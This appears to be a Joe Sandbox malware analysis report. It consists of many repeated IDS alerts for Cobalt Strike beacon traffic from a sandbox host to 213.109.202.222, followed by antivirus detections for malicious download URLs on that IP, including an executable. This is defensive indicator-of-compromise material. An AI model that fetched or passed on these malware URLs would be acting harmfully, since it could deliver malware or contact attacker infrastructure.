ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:56.680872
SID:	2033713
Source Port:	49934
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:40.570896
SID:	2033713
Source Port:	49897
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:18.834966
SID:	2033713
Source Port:	49845
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:38.474165
SID:	2033713
Source Port:	49892
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:52.006691
SID:	2033713
Source Port:	49925
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:52.520322
SID:	2033713
Source Port:	49926
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:49.961162
SID:	2033713
Source Port:	49920
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:36.940682
SID:	2033713
Source Port:	49889
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:15.252376
SID:	2033713
Source Port:	49837
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:22.938294
SID:	2033713
Source Port:	49854
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:10.170690
SID:	2033713
Source Port:	49961
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:13.312979
SID:	2033713
Source Port:	49967
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:03.913535
SID:	2033713
Source Port:	49949
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:30.211390
SID:	2033713
Source Port:	49872
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:44.704300
SID:	2033713
Source Port:	49908
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:48.395611
SID:	2033713
Source Port:	49915
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:01.300035
SID:	2033713
Source Port:	49944
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:32.789446
SID:	2033713
Source Port:	49878
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:37.961908
SID:	2033713
Source Port:	49891
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:10.696230
SID:	2033713
Source Port:	49962
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:23.450534
SID:	2033713
Source Port:	49855
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:00.788294
SID:	2033713
Source Port:	49942
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:19.872901
SID:	2033713
Source Port:	49847
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:01.818068
SID:	2033713
Source Port:	49945
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:59.255111
SID:	2033713
Source Port:	49939
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:57.704450
SID:	2033713
Source Port:	49936
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:26.550223
SID:	2033713
Source Port:	49862
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:22.428397
SID:	2033713
Source Port:	49853
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:04.967332
SID:	2033713
Source Port:	49951
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:14.350644
SID:	2033713
Source Port:	49969
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:16.451462
SID:	2033713
Source Port:	49975
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:32.265880
SID:	2033713
Source Port:	49877
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:14.873905
SID:	2033713
Source Port:	49972
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:12.787062
SID:	2033713
Source Port:	49966
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:08.620213
SID:	2033713
Source Port:	49958
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:28.656160
SID:	2033713
Source Port:	49869
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:35.378350
SID:	2033713
Source Port:	49886
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:31.242631
SID:	2033713
Source Port:	49875
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:16.789257
SID:	2033713
Source Port:	49840
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:11.733860
SID:	2033713
Source Port:	49964
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:04.278105
SID:	2019714
Source Port:	49825
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:50.984191
SID:	2033713
Source Port:	49923
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:02.869302
SID:	2033713
Source Port:	49947
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:24.488815
SID:	2033713
Source Port:	49858
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:41.612793
SID:	2033713
Source Port:	49899
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:43.667960
SID:	2033713
Source Port:	49906
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:06.003067
SID:	2033713
Source Port:	49953
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:46.847678
SID:	2033713
Source Port:	49912
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:31.752824
SID:	2033713
Source Port:	49876
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:29.167927
SID:	2033713
Source Port:	49870
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:15.925350
SID:	2033713
Source Port:	49974
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:12.272407
SID:	2033713
Source Port:	49965
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:47.373290
SID:	2033713
Source Port:	49913
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:39.522209
SID:	2033713
Source Port:	49894
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:55.112350
SID:	2033713
Source Port:	49931
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:53.556258
SID:	2033713
Source Port:	49928
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:58.217755
SID:	2033713
Source Port:	49937
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:16.277694
SID:	2033713
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:59.764498
SID:	2033713
Source Port:	49940
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:21.917474
SID:	2033713
Source Port:	49851
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:49.434125
SID:	2033713
Source Port:	49919
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:17.300087
SID:	2033713
Source Port:	49842
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:07.041030
SID:	2033713
Source Port:	49955
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:25.511968
SID:	2033713
Source Port:	49860
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:33.826887
SID:	2033713
Source Port:	49880
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:40.045890
SID:	2033713
Source Port:	49895
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:45.230335
SID:	2033713
Source Port:	49909
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:47.883252
SID:	2033713
Source Port:	49914
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:17.812839
SID:	2033713
Source Port:	49843
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:20.382830
SID:	2033713
Source Port:	49848
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:55.625976
SID:	2033713
Source Port:	49932
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:34.851448
SID:	2033713
Source Port:	49884
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:15.400199
SID:	2033713
Source Port:	49973
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:07.566489
SID:	2033713
Source Port:	49956
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:04.439371
SID:	2033713
Source Port:	49950
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:26.040665
SID:	2033713
Source Port:	49861
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:20.894180
SID:	2033713
Source Port:	49849
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:50.471544
SID:	2033713
Source Port:	49921
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:58.743861
SID:	2033713
Source Port:	49938
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:18.324235
SID:	2033713
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:03.394343
SID:	2033713
Source Port:	49948
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:56.153729
SID:	2033713
Source Port:	49933
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:21.406933
SID:	2033713
Source Port:	49850
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:37.450653
SID:	2033713
Source Port:	49890
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:53.047327
SID:	2033713
Source Port:	49927
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:15.768907
SID:	2033713
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:09.644062
SID:	2033713
Source Port:	49960
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:11.207160
SID:	2033713
Source Port:	49963
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:43.154248
SID:	2033713
Source Port:	49902
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:29.693177
SID:	2033713
Source Port:	49871
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:27.603807
SID:	2033713
Source Port:	49865
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:06.516202
SID:	2033713
Source Port:	49954
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:25.000717
SID:	2033713
Source Port:	49859
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:46.319962
SID:	2033713
Source Port:	49911
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:08.093915
SID:	2033713
Source Port:	49957
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:28.130203
SID:	2033713
Source Port:	49868
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:54.073989
SID:	2033713
Source Port:	49929
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:27.077436
SID:	2033713
Source Port:	49863
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:05.478066
SID:	2033713
Source Port:	49952
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:02.344835
SID:	2033713
Source Port:	49946
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:42.133072
SID:	2033713
Source Port:	49900
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:41.083259
SID:	2033713
Source Port:	49898
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:23.977505
SID:	2033713
Source Port:	49857
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:35.903974
SID:	2033713
Source Port:	49887
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:48.908135
SID:	2033713
Source Port:	49918
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:00.275464
SID:	2033713
Source Port:	49941
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:59:16.977287
SID:	2033713
Source Port:	49976
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:51.496149
SID:	2033713
Source Port:	49924
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:38.996380
SID:	2033713
Source Port:	49893
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:57.192290
SID:	2033713
Source Port:	49935
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:19.347756
SID:	2033713
Source Port:	49846
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Cobalt Strike Beacon Observed - Source IP: 192.168.2.17 - Destination IP: 213.109.202.222

Timestamp:	02/29/24-11:58:54.600597
SID:	2033713
Source Port:	49930
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: http://213.109.202.222/download/xml.xml

Avira URL Cloud: detection malicious, Label: malware

Antivirus detection for URL or domain

Source: http://213.109.202.222/download/xml.exe

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\Downloads\857bae32-9da1-41f6-909a-b81fa10c92f3.tmp	Avira: detection malicious, Label: HEUR/AGEN.1315826
Source: C:\Users\user\Downloads\857bae32-9da1-41f6-909a-b81fa10c92f3.tmp	Avira: detection malicious, Label: HEUR/AGEN.1315826
Source: C:\Users\user\Downloads\857bae32-9da1-41f6-909a-b81fa10c92f3.tmp	Avira: detection malicious, Label: HEUR/AGEN.1315826

Multi AV Scanner detection for domain / URL

Source: http://213.109.202.222/download/xml.exe	Virustotal: Detection: 19%			Perma Link
Source: http://213.109.202.222/j.ad	Virustotal: Detection: 9%			Perma Link

Multi AV Scanner detection for dropped file

Source: :sel (copy)	ReversingLabs: Detection: 75%
Source: :sel (copy)	Virustotal: Detection: 68%			Perma Link

Multi AV Scanner detection for submitted file

Source: http://213.109.202.222/download/xml.xml

Virustotal: Detection: 10%

Perma Link

Source: file:///C:/Users/user/Downloads/xml.xml

